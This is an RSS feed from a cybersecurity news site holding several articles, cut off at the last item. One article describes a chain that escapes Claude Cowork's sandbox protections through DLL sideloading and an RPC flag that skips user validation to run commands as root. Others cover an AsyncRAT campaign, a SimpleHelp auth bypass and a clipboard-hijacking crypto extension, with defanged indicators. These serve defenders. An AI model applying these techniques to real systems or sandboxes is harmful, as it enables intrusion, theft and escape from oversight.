<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Cybercriminals &#8211; First Hackers News</title>
	<atom:link href="https://firsthackersnews.com/category/cybercriminals/feed/" rel="self" type="application/rss+xml" />
	<link>https://firsthackersnews.com</link>
	<description>Latest cybersecurity news, real attacks, and practical IOCs—made simple and actionable.</description>
	<lastBuildDate>Thu, 02 Jul 2026 20:36:52 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>

<image>
	<url>https://firsthackersnews.com/wp-content/uploads/2026/03/cropped-FHN_512x512-32x32.png</url>
	<title>Cybercriminals &#8211; First Hackers News</title>
	<link>https://firsthackersnews.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Claude Cowork Sandbox Flaw Allows Root Access</title>
		<link>https://firsthackersnews.com/claude-cowork-sandbox/</link>
					<comments>https://firsthackersnews.com/claude-cowork-sandbox/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Thu, 02 Jul 2026 20:36:41 +0000</pubDate>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[vulnerability]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11966</guid>

					<description><![CDATA[<p>Security researchers have uncovered a vulnerability chain in Anthropic&#8217;s Claude Cowork Sandbox that allows a local attacker to</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/claude-cowork-sandbox/">Claude Cowork Sandbox Flaw Allows Root Access</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Security researchers have uncovered a vulnerability chain in <strong>Anthropic&#8217;s Claude Cowork Sandbox</strong> that allows a local attacker to bypass multiple security protections and execute arbitrary commands as <strong>root</strong> inside the product&#8217;s isolated Linux sandbox.</p>



<p>Although the attack requires local code execution on the host system, the research demonstrates that several built-in security mechanisms can be bypassed, ultimately leading to full administrative control within the sandbox.</p>



<h2 class="wp-block-heading"><strong>How Claude Cowork Protects Its Sandbox</strong></h2>



<p>Claude Cowork Sandbox is designed to help users build applications and automate tasks using Claude Code within an isolated environment.</p>



<p>On Windows, the platform runs workloads inside a <strong>Hyper-V-based Ubuntu virtual machine</strong> protected by several security layers, including:</p>



<ul class="wp-block-list">
<li>Hyper-V isolated Ubuntu VM</li>



<li>Authenticode-based named pipe authentication</li>



<li>Bubblewrap sandbox namespaces</li>



<li>Per-session unprivileged Linux users</li>



<li>Seccomp filtering</li>



<li>Domain-restricted outbound network access</li>
</ul>



<p>These protections are intended to isolate workloads and prevent unauthorized access to the underlying environment.</p>



<h2 class="wp-block-heading"><strong>Researchers Found a Way Around the Protections</strong></h2>



<p>According to research published by <strong>Armadin</strong>, the attack targeted the <strong>CoworkVMService</strong>, a Local System service responsible for managing communication between Windows and the Ubuntu virtual machine.</p>



<p>The service uses a named pipe and validates that only applications digitally signed by <strong>Anthropic</strong> can communicate with it.</p>



<p>Researchers attempted to bypass the signature validation but found that the authentication checks correctly rejected forged signatures and invalid trust chains.</p>



<p>Instead, they identified another attack path.</p>



<h2 class="wp-block-heading"><strong>DLL Sideloading Enabled Code Execution</strong></h2>



<p>Researchers discovered that <strong>claude.exe</strong> loads <strong>USERENV.dll</strong> from its application directory before loading the legitimate Windows system library.</p>



<p>By placing a malicious <strong>USERENV.dll</strong> alongside the application, they successfully performed <strong>DLL sideloading</strong>, allowing arbitrary code to execute inside the trusted Anthropic process.</p>



<p>Because the malicious code was running within the signed application, it successfully passed the service&#8217;s identity verification.</p>



<h2 class="wp-block-heading"><strong>Root Access Achieved Through RPC Manipulation</strong></h2>



<p>After gaining code execution, researchers analyzed the application&#8217;s JSON-based RPC protocol used to communicate with the virtual machine.</p>



<p>The protocol exposed several methods, including:</p>



<ul class="wp-block-list">
<li>configure</li>



<li>startVM</li>



<li>isGuestConnected</li>



<li>spawn</li>
</ul>



<p>While most security controls continued to function correctly, researchers discovered that two parameters—<strong>isResume</strong> and <strong>allowedDomains</strong>—were forwarded directly to the sandbox daemon without sufficient validation.</p>



<p>By fuzzing the RPC interface, they reconstructed the parameter structure and identified a logic flaw.</p>



<p>Normally, setting <strong>isResume</strong> to <strong>false</strong> creates a new unprivileged Linux user.</p>



<p>However, when <strong>isResume</strong> was set to <strong>true</strong>, the existing user validation was skipped entirely.</p>



<p>This allowed researchers to specify any username, including <strong>root</strong>, and execute commands with root privileges inside the sandbox.</p>



<h2 class="wp-block-heading"><strong>Security Impact</strong></h2>



<p>The vulnerability demonstrates that multiple security boundaries can be bypassed once an attacker gains local code execution.</p>



<p>Although Anthropic&#8217;s threat model assumes local access is already required, the research highlights how privilege escalation can occur even inside heavily sandboxed AI environments.</p>



<p>Successful exploitation could allow an attacker to:</p>



<ul class="wp-block-list">
<li>Execute commands as root inside the Linux sandbox.</li>



<li>Bypass intended privilege restrictions.</li>



<li>Gain unrestricted administrative access within the virtual machine.</li>



<li>Circumvent multiple sandbox security controls.</li>
</ul>



<p>The issue was successfully demonstrated against <strong>Claude Desktop for Windows version 1.9255.2.0</strong>.</p>



<p>As AI-powered development environments continue to evolve, this research serves as a reminder that sandbox implementations should be regularly reviewed to ensure privilege boundaries cannot be bypassed through chained vulnerabilities.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/claude-cowork-sandbox/">Claude Cowork Sandbox Flaw Allows Root Access</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/claude-cowork-sandbox/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Fake Installers Spread AsyncRAT Using ScreenConnect</title>
		<link>https://firsthackersnews.com/asyncrat-screenconnect/</link>
					<comments>https://firsthackersnews.com/asyncrat-screenconnect/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Thu, 02 Jul 2026 20:21:57 +0000</pubDate>
				<category><![CDATA[Android malware]]></category>
		<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[AsyncRAT]]></category>
		<category><![CDATA[cyber attack]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[DLL Sideloading]]></category>
		<category><![CDATA[endpoint security]]></category>
		<category><![CDATA[Fake Installers]]></category>
		<category><![CDATA[kaspersky]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[malware campaign]]></category>
		<category><![CDATA[powershell]]></category>
		<category><![CDATA[Process Hollowing]]></category>
		<category><![CDATA[RAT]]></category>
		<category><![CDATA[Reflective Loading]]></category>
		<category><![CDATA[remote access]]></category>
		<category><![CDATA[remote access tool]]></category>
		<category><![CDATA[screenconnect]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<category><![CDATA[windows security]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11962</guid>

					<description><![CDATA[<p>Cybersecurity researchers have uncovered a large-scale malware campaign in which threat actors are abusing the legitimate ScreenConnect remote</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/asyncrat-screenconnect/">Fake Installers Spread AsyncRAT Using ScreenConnect</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Cybersecurity researchers have uncovered a large-scale malware campaign in which threat actors are abusing the legitimate <strong>ScreenConnect</strong> remote access software to deliver <strong>AsyncRAT</strong> through fake software installers.</p>



<p>Instead of relying on traditional malware downloaders, the attackers combine trusted applications, DLL sideloading, reflective loading, and process hollowing to quietly install remote access malware while avoiding detection.</p>



<h2 class="wp-block-heading"><strong>Fake Software Websites Used as Lures</strong></h2>



<p>The attackers created numerous fake download websites designed to imitate popular software applications.</p>



<p>Some of the impersonated software includes:</p>



<ul class="wp-block-list">
<li>OBS Studio</li>



<li>DNS Jumper</li>



<li>DS4Windows</li>



<li>Bandicam</li>



<li>Other widely used freeware applications</li>
</ul>



<p>Many of these websites were translated into more than ten languages, allowing the campaign to target users across multiple regions.</p>



<p>Researchers also found that search engine optimization (SEO) techniques helped these malicious websites appear higher in search results, increasing the likelihood that users would download the infected installers.</p>



<h2 class="wp-block-heading"><strong>How the Infection Works</strong></h2>



<p>Each downloaded archive contains a mix of legitimate and malicious files.</p>



<p>The package typically includes:</p>



<ul class="wp-block-list">
<li>A legitimate Microsoft-signed <strong>install.exe</strong></li>



<li>A malicious <strong>install.res.1033.dll</strong></li>



<li>An <strong>Assets</strong> folder containing the legitimate software</li>



<li>A renamed ScreenConnect MSI installer disguised as a trusted file, such as <strong>vcredist_x64.dll</strong></li>
</ul>



<p>When the user launches the installer, the signed executable automatically loads the malicious DLL through <strong>DLL sideloading</strong>.</p>



<p>The DLL silently installs the ScreenConnect service and registers it under names that appear legitimate, such as <strong>Microsoft Update Service</strong>, before connecting the infected system to attacker-controlled servers.</p>



<h2 class="wp-block-heading"><strong>Multiple Techniques Used to Evade Detection</strong></h2>



<p>Once ScreenConnect is installed, attackers execute PowerShell and VBScript commands to strengthen their foothold on the system.</p>



<p>The scripts perform several actions, including:</p>



<ul class="wp-block-list">
<li>Adding Microsoft Defender exclusions for entire drives and important processes.</li>



<li>Disabling User Account Control (UAC) prompts.</li>



<li>Dropping additional malware components into the <strong>C:\Users\Public</strong> directory.</li>
</ul>



<p>The malware then decrypts an encrypted payload stored in <strong>secret_bytes.txt</strong>. A PowerShell script named <strong>cap.ps1</strong> reconstructs the payload by decoding hexadecimal data, applying XOR decryption, and rebuilding the executable entirely in memory.</p>



<p>The recovered .NET assembly is loaded directly into memory using <strong>reflective loading</strong>, avoiding the need to write the malware to disk.</p>



<h2 class="wp-block-heading"><strong>AsyncRAT Deployed Through Process Hollowing</strong></h2>



<p>To further reduce detection, the malware launches <strong>RegAsm.exe</strong> in a suspended state before replacing its memory with the AsyncRAT payload using <strong>process hollowing</strong>.</p>



<p>Running the malware inside a legitimate Windows process helps it blend in with normal system activity and bypass some security tools that rely on process reputation.</p>



<h2 class="wp-block-heading"><strong>Persistence and Infrastructure</strong></h2>



<p>To maintain long-term access, the attackers create a scheduled task named <strong>MasterPackager.Updater</strong>.</p>



<p>The task runs every <strong>two minutes</strong>, allowing the malware to restart automatically after reboots or if its processes are terminated.</p>



<p>Kaspersky researchers also identified two major infrastructure clusters supporting the campaign.</p>



<p>The operation used:</p>



<ul class="wp-block-list">
<li>Multiple command-and-control (C2) servers</li>



<li>Numerous spoofed domains</li>



<li>Separate download servers for malware archives</li>



<li>ScreenConnect configuration files pointing to attacker infrastructure</li>
</ul>



<p>Based on domain registration data, researchers believe the campaign has been active since <strong>October 2025</strong> and continued operating through <strong>March 2026</strong>, with several fake download websites still accessible online.</p>



<h2 class="wp-block-heading"><strong>Security Recommendations</strong></h2>



<p>Because this campaign abuses trusted software and legitimate administrative tools, organizations should strengthen their defenses against both malware and software supply chain attacks.</p>



<p>Security teams should consider the following measures:</p>



<ul class="wp-block-list">
<li>Download software only from official vendor websites.</li>



<li>Block MSI installers from untrusted locations.</li>



<li>Monitor for newly created Windows services and scheduled tasks.</li>



<li>Detect unusual DLL sideloading activity.</li>



<li>Watch for suspicious use of PowerShell, VBScript, and signed Windows binaries.</li>



<li>Monitor outbound connections to unknown remote management servers.</li>



<li>Keep endpoint protection enabled and regularly updated.</li>



<li>Educate users to verify download sources before installing software.</li>
</ul>



<p>This campaign demonstrates how attackers continue to blend legitimate administration tools with advanced malware techniques. By combining trusted software, stealthy execution methods, and fake software distribution sites, threat actors can significantly increase the chances of compromising both individual users and enterprise environments.</p>



<h2 class="wp-block-heading" id="h-iocs"><strong>IOCs</strong></h2>



<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><th class="has-text-align-left" data-align="left">Type</th><th class="has-text-align-left" data-align="left">Indicator</th><th class="has-text-align-left" data-align="left">Description</th></tr></thead><tbody><tr><td>Domain</td><td>mora1987[.]work[.]gd</td><td>AsyncRAT C2 server domain</td></tr><tr><td>URL</td><td>hxxps[:]//fileget.loseyourip[.]com/obs-studio-windows-full/gVOMs5VZ9BtlcaM</td><td>Malicious OBS Studio installer download link</td></tr><tr><td>URL</td><td>hxxps[:]//direct-download.giize[.]com/dns-jumper/iopbsr4hymbo7nfa1q7j</td><td>Malicious DNS Jumper installer download link</td></tr></tbody></table></figure>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/asyncrat-screenconnect/">Fake Installers Spread AsyncRAT Using ScreenConnect</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/asyncrat-screenconnect/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>CISA Flags SimpleHelp Flaw as Actively Exploited</title>
		<link>https://firsthackersnews.com/simplehelp-vulnerability/</link>
					<comments>https://firsthackersnews.com/simplehelp-vulnerability/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Wed, 01 Jul 2026 18:02:20 +0000</pubDate>
				<category><![CDATA[CISA]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Exploitation]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[security advisory]]></category>
		<category><![CDATA[security fix]]></category>
		<category><![CDATA[security flaw]]></category>
		<category><![CDATA[security update]]></category>
		<category><![CDATA[security vulnerability]]></category>
		<category><![CDATA[vulnerability impact]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11950</guid>

					<description><![CDATA[<p>The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-48558, a critical vulnerability affecting SimpleHelp remote support</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/simplehelp-vulnerability/">CISA Flags SimpleHelp Flaw as Actively Exploited</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added <strong>CVE-2026-48558</strong>, a critical vulnerability affecting <strong>SimpleHelp</strong> remote support software, to its <strong>Known Exploited Vulnerabilities (KEV)</strong> catalog. The listing confirms that the flaw is being actively exploited, and organizations are urged to apply security updates without delay.</p>



<p>The vulnerability affects environments where <strong>OpenID Connect (OIDC)</strong> authentication is enabled. Due to improper verification of cryptographic signatures, attackers can bypass authentication and gain unauthorized access to affected systems.</p>



<h2 class="wp-block-heading"><strong>How the Vulnerability Works</strong></h2>



<p>According to CISA, the issue occurs because SimpleHelp does not properly validate identity tokens during the OIDC authentication process. As a result, a remote attacker can create forged identity tokens and have them accepted as legitimate.</p>



<p>This allows attackers to impersonate authorized users without valid credentials and gain technician-level access to the application. In some environments, the vulnerability may also allow attackers to bypass multi-factor authentication (MFA), significantly increasing the risk of unauthorized access.</p>



<p>Because SimpleHelp is widely used for remote IT support, successful exploitation could provide attackers with direct access to managed devices, creating opportunities for privilege escalation and lateral movement across enterprise networks.</p>



<h2 class="wp-block-heading"><strong>Immediate Action Required</strong></h2>



<p>CISA has instructed federal agencies to remediate the vulnerability under <strong>Binding Operational Directive (BOD) 26-04</strong>, with a deadline of <strong>July 2, 2026</strong>. The agency also recommends that organizations follow vendor guidance, prioritize patching internet-facing systems, and review affected environments for signs of compromise.</p>



<p>If patches cannot be applied immediately, organizations should consider temporarily removing vulnerable SimpleHelp servers from public access until security updates are in place.</p>



<p>Although CISA has not linked the vulnerability to ransomware attacks, its inclusion in the KEV catalog confirms that threat actors are actively exploiting the flaw. Organizations using SimpleHelp should treat this issue as a high priority and apply the latest security updates as soon as possible to reduce the risk of unauthorized access.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/simplehelp-vulnerability/">CISA Flags SimpleHelp Flaw as Actively Exploited</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/simplehelp-vulnerability/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Malicious Extension Swaps Crypto Wallet Addresses</title>
		<link>https://firsthackersnews.com/malicious-browser-extension-crypto/</link>
					<comments>https://firsthackersnews.com/malicious-browser-extension-crypto/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Wed, 01 Jul 2026 17:15:03 +0000</pubDate>
				<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Bitcoin]]></category>
		<category><![CDATA[Blockchain security]]></category>
		<category><![CDATA[browser extension]]></category>
		<category><![CDATA[Browser Security]]></category>
		<category><![CDATA[chromium]]></category>
		<category><![CDATA[Crypto theft]]></category>
		<category><![CDATA[crypto wallet]]></category>
		<category><![CDATA[cryptocurrency]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Ethereum]]></category>
		<category><![CDATA[google chrome]]></category>
		<category><![CDATA[malicious browser extension]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11944</guid>

					<description><![CDATA[<p>Cybersecurity researchers have uncovered a sophisticated campaign distributing a malicious Chromium-based browser extension that silently replaces cryptocurrency wallet</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/malicious-browser-extension-crypto/">Malicious Extension Swaps Crypto Wallet Addresses</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Cybersecurity researchers have uncovered a sophisticated campaign distributing a malicious Chromium-based browser extension that silently replaces cryptocurrency wallet addresses during transactions. Disguised as a lightweight <strong>&#8220;Google Notes&#8221;</strong> extension, the malware is designed to steal digital assets without alerting the victim.</p>



<p>The attack is delivered through unsigned installers written in both <strong>.NET</strong> and <strong>Golang</strong>. Instead of installing the extension through an official browser store, the malware directly modifies Chromium browser files to install the extension and maintain persistence.</p>



<h2 class="wp-block-heading"><strong>How the Attack Works</strong></h2>



<p>Once executed, the installer searches for Chromium-based browsers such as <strong>Google Chrome, Microsoft Edge, Brave</strong>, and other compatible browsers. It terminates running browser processes and modifies the <strong>Preferences</strong> and <strong>Secure Preferences</strong> files to register the malicious extension.</p>



<figure class="wp-block-image size-full"><img fetchpriority="high" decoding="async" width="1024" height="818" src="https://firsthackersnews.com/wp-content/uploads/2026/07/image.png" alt="" class="wp-image-11945" srcset="https://firsthackersnews.com/wp-content/uploads/2026/07/image-177x142.png 177w, https://firsthackersnews.com/wp-content/uploads/2026/07/image-300x240.png 300w, https://firsthackersnews.com/wp-content/uploads/2026/07/image-768x614.png 768w, https://firsthackersnews.com/wp-content/uploads/2026/07/image.png 1024w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Source : McAfee</em></figcaption></figure>



<p>Researchers found that the malware recalculates browser integrity values, allowing the extension to bypass certain security checks on older Chromium versions. On newer versions, the attackers rely on social engineering or developer mode to enable the extension. After installation, the installer removes itself, leaving very few traces on the infected system.</p>



<p>Unlike traditional malware that connects to a hardcoded command-and-control server, the extension uses an <strong>EtherHiding</strong> technique. It queries a public blockchain RPC endpoint and retrieves an encoded value from a smart contract, which is decoded at runtime to obtain the active backend server. This approach allows attackers to change their infrastructure without updating the malware itself, making detection and takedown more difficult.</p>



<h2 class="wp-block-heading"><strong>Wallet Address Replacement and Detection</strong></h2>



<p>The extension requests broad permissions, including access to websites, browsing history, and clipboard data. It continuously monitors copy-and-paste activity and uses cryptocurrency-specific patterns to identify wallet addresses for multiple blockchains, including:</p>



<ul class="wp-block-list">
<li>Bitcoin (BTC)</li>



<li>Ethereum (ETH)</li>



<li>Bitcoin Cash (BCH)</li>



<li>Ripple (XRP)</li>



<li>Dash (DASH)</li>



<li>Solana (SOL)</li>
</ul>



<p>When a wallet address is copied, the extension sends it to the attacker&#8217;s backend using an embedded API key. The server responds with an attacker-controlled wallet address, which immediately replaces the original address in the clipboard. If the victim pastes the address without verifying it, the cryptocurrency is transferred directly to the attacker&#8217;s wallet.</p>



<p>Researchers also found that the installer contains embedded configuration data, including API keys, extension settings, supported wallet types, and blockchain RPC endpoints. The malicious extension is downloaded separately during installation, allowing attackers to update components without modifying the installer.</p>



<p>The campaign has affected users across multiple regions, with researchers observing a notable concentration of infections in India, suggesting opportunistic targeting of cryptocurrency users rather than a region-specific operation.</p>



<p>To reduce the risk of compromise, users should install browser extensions only from official stores, avoid running unsigned installers, carefully review requested permissions, and always verify the first and last few characters of a cryptocurrency wallet address before completing a transaction. </p>



<p>Security teams should also monitor for unauthorized changes to Chromium <strong>Secure Preferences</strong> files, unexpected browser configuration modifications, and unusual blockchain RPC traffic associated with <strong>EtherHiding</strong> infrastructure.</p>



<h2 class="wp-block-heading"><strong>IOCs</strong></h2>



<figure class="wp-block-table"><table class="has-fixed-layout"><thead><tr><th class="has-text-align-left" data-align="left">Type</th><th class="has-text-align-left" data-align="left">Category</th><th class="has-text-align-left" data-align="left">Value</th></tr></thead><tbody><tr><td>SHA-256</td><td>.NET Installer (BaseZipInstaller)</td><td>2735e12030c195fb5454e4736c51b55b59664b93cae9f4bd5317afcd9c2af0bf<br />053620962047f50a91c6e8d1a6519eccc41fab51473f033086b4d816abe8bcb0</td></tr><tr><td>SHA-256</td><td>Golang-compiled Installer Variant</td><td>11be4c47ff049322de41743f62544cafd32d67e24ad653b7ebedf8ebd63e0962<br />1432393691b415d0cd4680d9cee73e60896fbe63300d9f0355c96e91817e4b1d</td></tr><tr><td>URL</td><td>Payload distribution</td><td>hxxps://google-services[.]cc/base[.]zip</td></tr><tr><td>Domain</td><td>Command-and-Control (resolved via smart contract)</td><td>devops-offensive[.]cc<br />Zebregts[.]com</td></tr><tr><td>BTC wallet</td><td>Crypto wallet</td><td>3JvDBvKbS6YYMKjV3R9e9Zfd67f467fNLy<br />1BbhVBxpniuZuAL1gGZnEMdQhmz9JGWpyT<br />3AcPNVh7NyESwX3ECymy3rkdH4Ke2c26Tj<br />1BVTrB47erypG3tevi1U9Fv6BbNUBEiuiX</td></tr><tr><td>Artifact</td><td>Sideload target</td><td>Chromium Secure Preferences file (Chrome, Edge, Brave, Opera profiles)</td></tr><tr><td>Extension files</td><td>manifest.json<br />crypto-patterns.js<br />Interceptor.js<br />content-script.j<br />cache.js<br />domain-resolver.js<br />service-worker.js<br />api-client.js</td><td>ed2599d6a8f30d5eaf14ad7f855aece0acdf7efa4a148eb18e4d9f0d8e2cd90c<br />daf82c67e8e5df6bbd5370172ac9374aa7dce48af05496e8ec3dba7b602c619b<br />6eb2f07265dd95cacd39dfcf0705786b97f3e173cf4e9b3dfe7bad141c9a9dd5<br />a2ffdbedc5c9f5400a2b1cf5d35f5ec1df06a74d0345f1035bcf75d36ed73e01<br />eb84ba4a0cd95655a021865d4fec93ae3393f86cc9848810ed0b49035b1c5e2c<br />6aaba685669d779ef8be8f7f4231096cfafd0ef386f3897c5e2106c177724fc8<br />2599064901308a97540af29197ed0b38702bbee38d6dbbfa61cf9eb5878353f3<br />ab450927b37e1b68e2be68832c354ac600e86e2545a904d4ca0ea283f2600cc2</td></tr></tbody></table></figure>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/malicious-browser-extension-crypto/">Malicious Extension Swaps Crypto Wallet Addresses</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/malicious-browser-extension-crypto/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>WhatsApp Introduces Usernames for Private Messaging</title>
		<link>https://firsthackersnews.com/whatsapp-usernames/</link>
					<comments>https://firsthackersnews.com/whatsapp-usernames/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Mon, 29 Jun 2026 22:17:34 +0000</pubDate>
				<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Chat Security]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Digital Privacy]]></category>
		<category><![CDATA[Messaging]]></category>
		<category><![CDATA[Meta]]></category>
		<category><![CDATA[mobile security]]></category>
		<category><![CDATA[Online Privacy]]></category>
		<category><![CDATA[privacy]]></category>
		<category><![CDATA[Privacy Features]]></category>
		<category><![CDATA[Secure Messaging]]></category>
		<category><![CDATA[social media]]></category>
		<category><![CDATA[Technology News]]></category>
		<category><![CDATA[whatsapp]]></category>
		<category><![CDATA[WhatsApp Usernames]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11937</guid>

					<description><![CDATA[<p>WhatsApp has introduced a new username feature designed to improve user privacy by allowing people to communicate without</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/whatsapp-usernames/">WhatsApp Introduces Usernames for Private Messaging</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>WhatsApp has introduced a new username feature designed to improve user privacy by allowing people to communicate without sharing their phone numbers. The update marks one of the platform&#8217;s most significant privacy enhancements, giving users greater control over how they connect with others.</p>



<p>Instead of exchanging phone numbers, users will be able to share a unique username when starting new conversations. This feature is especially useful when joining community groups, networking at events, or interacting with people for the first time.</p>



<p>The rollout is being introduced in phases, with users able to reserve their preferred usernames before the feature becomes widely available.</p>



<h2 class="wp-block-heading"><strong>How the Username Feature Works</strong></h2>



<p>Once the feature is enabled, new contacts will only see a user&#8217;s username instead of their phone number. Existing chats and contacts will continue to function normally, and users who prefer sharing phone numbers can continue using WhatsApp as they always have.</p>



<p>To prevent impersonation and abuse, WhatsApp has introduced several rules for creating usernames:</p>



<ul class="wp-block-list">
<li>Usernames must be <strong>3–35 characters</strong> long.</li>



<li>Only lowercase letters, numbers, periods, and underscores are allowed.</li>



<li>Every username must include at least one letter.</li>



<li>Usernames that resemble website domains, such as <strong>.com</strong> or <strong>.in</strong>, are not permitted.</li>



<li>Each username must be unique, and users can choose to match their existing Instagram or Facebook handle for consistent branding.</li>
</ul>



<p>WhatsApp has also added an optional <strong>username key</strong>, a four-digit PIN-like code that provides an additional layer of privacy. New contacts must enter this code before they can send a message, helping reduce spam and unwanted conversations. Existing contacts are not affected by this requirement.</p>



<h2 class="wp-block-heading"><strong>Improved Privacy and User Protection</strong></h2>



<p>Unlike many social media platforms, WhatsApp usernames are not searchable through a public directory. Users cannot browse or discover other usernames unless they already know the exact handle, significantly reducing unsolicited messages and unwanted contact.</p>



<p>The feature is available across Android, iOS, Windows, and WhatsApp Web as the rollout expands globally. Users can reserve a username by navigating to <strong>Settings → Account → Username</strong> on the latest version of the app. WhatsApp also provides username suggestions if a preferred handle has already been taken.</p>



<p>The new system is particularly beneficial for creators, businesses, and organizations, allowing them to use the same username across WhatsApp, Instagram, and Facebook for a consistent online identity.</p>



<p>By moving from phone number-based communication to username-based messaging, WhatsApp is strengthening user privacy while reducing unnecessary exposure of personal contact information. The update also brings the platform closer to privacy-focused messaging services that have long supported handle-based communication.</p>



<p>The post <a rel="nofollow" href="https://firsthackersnews.com/whatsapp-usernames/">WhatsApp Introduces Usernames for Private Messaging</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/whatsapp-usernames/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Splunk Secure Gateway RCE Vulnerability Discovered</title>
		<link>https://firsthackersnews.com/splunk-secure-gateway-rce/</link>
					<comments>https://firsthackersnews.com/splunk-secure-gateway-rce/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Mon, 29 Jun 2026 09:47:00 +0000</pubDate>
				<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
